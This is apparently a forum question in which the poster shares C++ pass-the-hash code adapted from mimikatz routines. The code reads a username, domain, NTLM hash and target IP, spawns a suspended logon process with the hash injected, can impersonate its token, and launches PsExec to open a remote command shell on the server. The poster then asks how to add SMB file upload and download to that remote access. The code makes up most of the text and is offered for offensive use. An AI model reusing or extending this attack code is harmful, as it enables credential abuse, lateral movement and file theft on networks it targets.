I have written a program with C++ that can spawn an authenticate cmd.exe process in a workgroup. In further, I can run the psexec.exe program with that authenticated token to connect the server machine.
printf("\n\t");
WarningMessage("%s\n", "Fill following information:");
printf("\n\t\tUsername: ");
wscanf(L"%ls", username);
printf("\t\tDomain: ");
wscanf(L"%ls", domain);
printf("\t\tNTLM Hash: ");
wscanf(L"%ls", hash_ntlm);
printf("\t\tDestination IP: ");
wscanf(L"%ls", ip_destination);
wcscpy(process_name, TEXT("PSExec.exe \\\\"));
wcscat(process_name, ip_destination);
wcscat(process_name, TEXT(" cmd.exe"));
if (kull_m_string_stringToHex(hash_ntlm, ntlm, LM_NTLM_HASH_LENGTH))
{
data.NtlmHash = ntlm;
}
else
{
printf("\t");
ErrorMessage("%s\n", "ntlm hash/rc4 key length must be 32 (16 bytes)");
}
printf("\n\t");
NormalMessage("%s\n", "PTH login to the Active Directory process has been started:");
if (data.NtlmHash)
{
if (LoginWithActiveDirectory(KULL_M_PROCESS_CREATE_LOGON, process_name, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, username, domain, L"", &process_infos, FALSE))
{
printf("\n");
PrintColorful(2, "\t\tPID: ");
printf("%d\n", process_infos.dwProcessId);
PrintColorful(2, "\t\tTID: ");
printf("%d\n\n", process_infos.dwThreadId);
if (OpenProcessToken(process_infos.hProcess, TOKEN_READ | (is_impersonate ? TOKEN_DUPLICATE : 0), &handle_token))
{
if (GetTokenInformation(handle_token, TokenStatistics, &token_status, sizeof(token_status), &needed_size))
{
kuhl_m_sekurlsa_pth_luid(&data);
if (is_impersonate)
{
if (DuplicateTokenEx(handle_token, TOKEN_QUERY | TOKEN_IMPERSONATE, NULL, SecurityDelegation, TokenImpersonation, &handle_new_token))
{
if (SetThreadToken(NULL, handle_new_token))
{
NormalMessage("%s\n", "Token Impersonated.");
}
else
{
ErrorMessage("%s\n", "SetThreadToken failed.");
CloseHandle(handle_new_token);
}
}
else
{
ErrorMessage("%s\n", "DuplicateTokenEx failed.");
NtTerminateProcess(process_infos.hProcess, STATUS_SUCCESS);
}
}
else
{
NtResumeProcess(process_infos.hProcess);
}
}
else
{
ErrorMessage("%s\n", "GetTokenInformation failed.");
}
}
else
{
ErrorMessage("%s\n", "OpenProcessToken failed.");
}
CloseHandle(process_infos.hThread);
CloseHandle(process_infos.hProcess);
printf("\n");
}
else
{
printf("\n\t");
ErrorMessage("%s\n", "PTH login to the Active Directory process has failed.");
}
}
else
{
printf("\t");
ErrorMessage("%s\n", "Missing some arguments for authentication.");
}
}
However, When psexec.exe executed it gives me just a command prompt environment for the server in which I can execute the command and see the result back but I wanted to have ability to download/upload files from the server machine.
However, unfortunately, I don't know how can I write a program that lets me download or upload files onto the server machine even after authentication.
I have searched and found out I should use SMB/CIFS but I couldn't find even a brief introduction which explain what should I do to implement such a program. Someone could share information about this problem?
